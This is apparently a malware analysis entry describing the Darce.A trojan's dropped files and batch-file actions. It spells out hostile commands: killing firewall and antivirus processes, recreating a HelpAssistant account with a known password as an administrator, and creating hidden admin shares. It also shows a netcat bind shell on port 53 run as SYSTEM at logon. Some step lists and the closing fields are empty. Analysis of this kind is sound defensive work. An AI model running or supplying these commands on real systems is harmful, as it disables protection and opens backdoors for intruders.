When Darce.A is executed it drops several files on disk:
- readme.txt (copy of UnRAR)
- setup.exe (compiled batch file)
- unpack.rar (encrypted RAR file)
setup.exe is then run, and it decrypts a batch file to c:\a7356.bat, which is then executed. The batch file performs the following operations:
1. Renames the dropped file readme.txt to cuk.exe. It then executes cuk.exe with the following command line:
- e unpack.rar %windir% -y -pko;XqZpX!qYpYlT -inul
This extracts 4 files from unpack.rar to the %WINDIR% directory:
- schtasks.exe (Czech version of Microsofts Schedule Tasks)
- schvost.exe (NetCat for Windows)
- taskkill.exe (Czech version of Microsofts Task Kill)
- odbcjet.vbs (Visual Basic script used for performing tasks at logon)
2. Calls taskkill.exe with the following parameters:
- /f /im kpf4ss.exe
- /f /im ccProxy.exe
This forcefully terminates processes with the image names kpf4ss.exe (Kerio Personal Firewall 4 Service) and ccProxy.exe (Symantec AV component). The result is piped to a file named %TEMP%\~015799.tmp".
3. Calls the following commands if the file %WINDIR%\system32\zonelabs\vsruledb.dll (ZoneAlarm firewall component) is not present on the system:
The results of these commands are piped to %TEMP%\~015798.tmp.
4. Calls further commands to gather information about the system:
- ver
- chdir
- set
- tasklist
- net start
- dir /a /q "%SystemDrive%\"
- dir /a /q "%ProgramFiles%\"
- dir /a "%userprofile%"\..
- dir /a d:\
- net localgroup
The results of all commands are piped to %TEMP%\~015799.tmp and %TEMP%\~0157998.tmp.
5. Uses NET USER to delete the HelpAssistant account and recreate it with the password Cukotka5". The HelpAssistant account is then added to the Power Users group and deleted from the Users group. All results are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp.
6. Calls more commands which are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp:
- net localgroup administrators
- net localgroup "Power Users"
- net localgroup users
- cacls "%userprofile%" /e /c /p "helpassistant":f
- cacls . /e /c /p "helpassistant":f
- fsutil fsinfo drives
- net share RPC$=c: /remark:"Vyhrazeno systemu Windows"
- net share ACL$=d: /remark:"Vyhrazeno systemu Windows"
- net share USR$="%userprofile%" /remark:"Vychozi sdileni uzivatele"
- type %systemdrive%\boot.ini
7. Appends %TEMP%\~015798.tmp to %TEMP%\~015799.tmp.
8. Copies %TEMP%\~015799.tmp, which now contains a rather comprehensive overview of the system, to the following locations:
- %WINDIR%\system32\msmgmt.dll
- %HOMEDRIVE%\%HOMEPATH%\PNG00002.jpg
9. Schedules a task using schtasks.exe, which was previously dropped into the %WINDIR% folder. The parameters used are:
- /create /tn AT1 /tr %windir%\odbcjet.vbs /sc onlogon /ru system
This creates a task with the name AT1", and specifies that odbcjet.vbs should be scheduled to run at every logon under the user context NTAUTHORITY\SYSTEM.
The file odbcjet.vbs, which was also dropped in to the %WINDIR% directory, is a Visual Basic script file that calls the following commands:
- net stop SharedAccess
- net stop alg.exe
- net stop sscansvc.exe
- schvost.exe -L -p 53 -e cmd.exe
- net user HelpAssistant /add
- net localgroup administrators helpassistant /add
- net share RPC$=c: /remark:Windows
The above schvost command causes schvost.exe to listen on port 53 for incoming connections. This enables an attacker to connect to an infected machine on port 53 and control a remote command prompt running with SYSTEM privileges. 10. Calls Taskkill.exe with the following parameters if %WINDIR%\command\edit.com is not present on the system:
This will forcefully terminate setup.exe, the program which created the batch file.
11. Renames setup.exe to sesit.xls and then deletes the file. 12. Deletes unpack.rar and cuk.exe.
|
Spreading: 
Overall risk: 